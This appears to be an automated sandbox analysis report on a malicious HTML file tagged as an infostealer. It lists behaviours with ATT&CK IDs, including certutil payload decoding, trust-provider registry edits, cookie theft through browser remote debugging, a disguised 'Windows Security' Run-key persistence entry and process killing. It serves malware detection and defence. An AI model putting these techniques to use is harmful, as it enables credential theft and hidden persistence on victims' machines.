b0a46f6c23505e15c64d15e5c3be708a68d3dc4098c53cd0db24c9550a5c11a3

Resubmissions

19/11/2024, 14:28

241119-rs8dgaxgpp 8

19/11/2024, 14:23

241119-rqapesxgln 4

Analysis

max time kernel
300s
max time network
294s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
19/11/2024, 14:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd42e30a-cb43-44b6-b3d3-8f1ac4c98221.htm
Size

11KB
MD5

09eeab1b61f3ad1d6d86b0e387ce7ea0
SHA1

3deb1dd145517c9141d0ef99eae2b727542f7d2b
SHA256

b0a46f6c23505e15c64d15e5c3be708a68d3dc4098c53cd0db24c9550a5c11a3
SHA512

57ff8471c338e490afd029f49be9b9731782aeaf8fa84d533fd09046511b4216248a9015490545c2519ae5681b32769e8061308ec963b2d5a5e1178127094552
SSDEEP

192:+u3d5a7061PAA4iY5XccWqJYpffR2UXF9b4p06nsGGfkCeGkcwDXFhFqeVvdf1uf:1M/4FXcpfhfHXFJ4p06BGfkDXFhFq8xE

Score

8^/10

credential_access defense_evasion discovery persistence spyware stealer

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe

Uses browser remote debugging 2 TTPs 24 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3340	chrome.exe
5836	chrome.exe
1280	chrome.exe
4428	chrome.exe
2248	msedge.exe
5760	chrome.exe
4596	chrome.exe
4468	chrome.exe
4344	msedge.exe
4132	chrome.exe
5408	msedge.exe
1136	chrome.exe
3684	chrome.exe
1844	chrome.exe
972	msedge.exe
4420	chrome.exe
4472	chrome.exe
396	chrome.exe
5188	chrome.exe
1176	chrome.exe
5764	chrome.exe
3412	chrome.exe
1108	chrome.exe
5072	chrome.exe

Executes dropped EXE 2 IoCs

pid	Process
6132	synaptics.exe
4756	synaptics.exe

Loads dropped DLL 64 IoCs

pid	Process
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
6132	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe
4756	synaptics.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Windows\\Explorer.EXE C:\\Users\\Public\\Windows Security.bat"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Windows\\Explorer.EXE C:\\Users\\Public\\Windows Security.bat"	reg.exe

Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
5068	certutil.exe
4676	certutil.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
95	ip-api.com
126	ip-api.com

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d8af05e4-7127-49db-9136-319727b3340f.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241119143129.pma	setup.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 22 IoCs

evasion

pid	Process
1020	taskkill.exe
5860	taskkill.exe
3996	taskkill.exe
3124	taskkill.exe
1860	taskkill.exe
5260	taskkill.exe
444	taskkill.exe
5352	taskkill.exe
1940	taskkill.exe
5676	taskkill.exe
4924	taskkill.exe
2544	taskkill.exe
3644	taskkill.exe
3048	taskkill.exe
5008	taskkill.exe
5540	taskkill.exe
5736	taskkill.exe
5520	taskkill.exe
5780	taskkill.exe
5884	taskkill.exe
5780	taskkill.exe
3804	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133765001268592524"	chrome.exe

Modifies registry class 36 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4152190078-1497776152-96910572-1000\{81CDEE41-E49D-4E4C-B76E-5382188600CB}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4152190078-1497776152-96910572-1000\{40B50B45-E0FD-464D-9C07-FC304E0A4AD3}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4976	chrome.exe
4976	chrome.exe
2880	chrome.exe
2880	chrome.exe
2880	chrome.exe
2880	chrome.exe
2996	msedge.exe
2996	msedge.exe
1972	msedge.exe
1972	msedge.exe
5648	identity_helper.exe
5648	identity_helper.exe
2432	msedge.exe
2432	msedge.exe
4396	msedge.exe
4396	msedge.exe
2248	msedge.exe
2248	msedge.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
2996	msedge.exe
2996	msedge.exe
2996	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe
Token: SeShutdownPrivilege	4976	chrome.exe
Token: SeCreatePagefilePrivilege	4976	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
4976	chrome.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
